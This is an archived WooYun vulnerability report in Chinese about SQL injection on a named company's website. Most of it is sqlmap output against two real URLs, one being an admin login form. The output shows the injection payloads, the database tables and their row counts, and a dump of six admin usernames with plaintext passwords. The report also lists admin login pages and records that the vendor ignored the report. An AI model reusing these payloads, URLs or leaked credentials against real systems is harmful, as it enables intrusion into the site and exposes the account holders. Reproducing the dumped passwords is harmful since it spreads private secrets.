乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-21: 细节已通知厂商并且等待厂商处理中 2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开
其实我纳闷的是主站就有注入,为什么没人提呢= =,是因为太弱了么
注入点还有很多,列举两例把url1:
http://www.ccib.com.cn/CHN/Home/HomeShow.asp?ContentID=4076
sqlmap identified the following injection point(s) with a total of 125 HTTP(s) requests:---Parameter: ContentID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ContentID=4076 AND 6958=6958 Vector: AND [INFERENCE]---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Accesssqlmap resumed the following injection point(s) from stored session:---Parameter: ContentID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ContentID=4076 AND 6958=6958 Vector: AND [INFERENCE]---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[9 tables]+------------+| admin_user || area || branch || company || exam || guestbook || job || member || news |+------------+
Database: Microsoft_Access_masterdb+------------+---------+| Table | Entries |+------------+---------+| member | 2829 || news | 392 || guestbook | 382 || job | 98 || area | 34 || branch | 28 || exam | 19 || company | 11 || admin_user | 6 |+------------+---------+
url2:
http://www.ccib.com.cn:80/CHN/forum/admin/Default.asp?action=loginok (POST)UserName=admin*&Password=admin&CheckCode=2972&Submit.x=47&Submit.y=26
sqlmap identified the following injection point(s) with a total of 133 HTTP(s) requests:---Parameter: UserName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: UserName=admin' AND 3572=3572 AND 'rbop'='rbop&Password=admin&CheckCode=2972&Submit.x=47&Submit.y=26 Vector: AND [INFERENCE]---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[2 tables]+------+| book || news |+------+
3.敏感页面http://www.ccib.com.cn/CHN/Web/Default.asphttp://www.ccib.com.cn/adm_login.asp
web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdbTable: admin_user[6 entries]+---------+----------+-----------+| user_id | password | user_name |+---------+----------+-----------+| 10 | lj350 | lj || 2 | 888888 | hr || 3 | c1c2i3b4 | crm || 6 | 353353 | feiyi || 8 | cai366 | cai || 9 | ccibasdf | epeng |+---------+----------+-----------+
登录跟没登录并没有什么区别,因为没什么卵用 - -,
过滤
危害等级:无影响厂商忽略
忽略时间:2016-01-21 16:06
非我公司站点
暂无